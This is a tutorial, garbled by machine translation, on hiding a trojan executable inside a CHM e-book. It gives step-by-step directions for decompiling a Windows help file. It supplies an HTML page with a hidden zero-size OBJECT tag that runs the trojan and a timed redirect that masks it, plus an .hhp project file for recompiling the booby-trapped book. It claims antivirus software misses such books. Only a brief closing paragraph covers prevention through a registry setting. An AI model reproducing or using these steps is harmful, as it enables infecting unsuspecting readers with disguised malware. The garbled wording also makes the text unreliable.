CHM e-Book Trojan making introduction tutorial-safety Course

Talk about the CHM format of the ebook, may be no one to Xiao. A large part of E-books are compiled using CHM format. Because the Trojan is embedded in the electronic book, antivirus software can not be in the presence of viruses and other destructive programs to check and clear. Want to know how to make this kind of electronic book? Today I will take the example form and everybody together analysis.
STEP1: To make a perfect CHM Trojan, of course, the production of e-book tools. Here we choose Microsoft's own Microsoft HTML help Workshop.
Of course, as a Trojan horse program carrier, a CHM ebook is indispensable. This article demonstrates that the windows.chm used in the system Help file is available.

STEP2: First run the Windows.chm, click the right menu in the right margin, and go to the Properties page. Record the default home page Default.htm and title bar text Windows 20,002 Information for this electronic document.

STEP3: Next need to make a Trojan horse can be run and can automatically jump to the Windows.chm default home page, such as cytkk.htm, the source code is as follows:

<HTML>
<HEAD>
<meta http-equiv= "Refresh" content= "3;url= ' default.htm '" >
</HEAD>
<BODY>
<object width=0 height=0 style= "Display:none;" Type= "Application/x-oleobje
CT "codebase=" Gray button Buster. exe ">
</OBJECT>
</BODY>
</HTML>

Code comments:

Content= "3 is the turning time (in seconds), can be modified according to the running time of Trojan Horse, it is recommended not to exceed 5 seconds. The Default.htm can be changed to the default homepage name of the ebook you use, the Gray button buster. exe is the name of the Trojan program, and you can change it according to the situation.

STEP4: Run HTML Help Workshop, select the decompile item under the File menu. Next, you will see WINDOWS.HHC in the deserialized directory (the table of contents item to the left of the Help document) and WINDOWS.HHK (the index item to the left of the Help document).

STEP5: Now to do is to copy the Trojan horse program in the back-compiled directory (in this article to insert the gray button Buster. exe), and in this directory to create a file name like CYTKK.HHP (in Notepad), the code is as follows:

[OPTIONS]
compatibility=1.1 or later
Compiled File=windows.chm
Default Window=main
language=0x804 Chinese (China)
[WINDOWS]
Main= "Windows", "WINDOWS.HHC", "windows.hhk", "cytkk.htm",,,,,, 0x420,150,0x104e,,0x0,0x0,,,,, 0
[FILES]
Cytkk.htm

Gray button Buster. exe

Code comments:

Windows.chm can be changed to the electronic title you want to generate, and the gray button buster. EXE will change it to the name of the trojan that you want to embed, main= to the title bar text you get when you first step. WINDOWS.HHC and WINDOWS.HHK, respectively, to the file name obtained in the third step.

Finally, with HTML Help Workshop open CYTKK.HHP, click "File" → "compile", to be prompted to complete, you can find in the target directory has been compiled with a Trojan book Windows.chm.

Master pass through: prevention of the Youdao

It is impossible for us to check every book we download, which is exhausting. I suggest that you download the electronic books, as far as possible to the well-known web site to download.
Other readers can also modify the local security properties, so that CHM Trojan can not run the Trojan horse program, the Registry "Hkey_current_u
Ser\software\microsoft\windows\current
The value of 1004 items under Version\internet settings\zones\0 is changed from 0 of the original decimal to 16 in 3.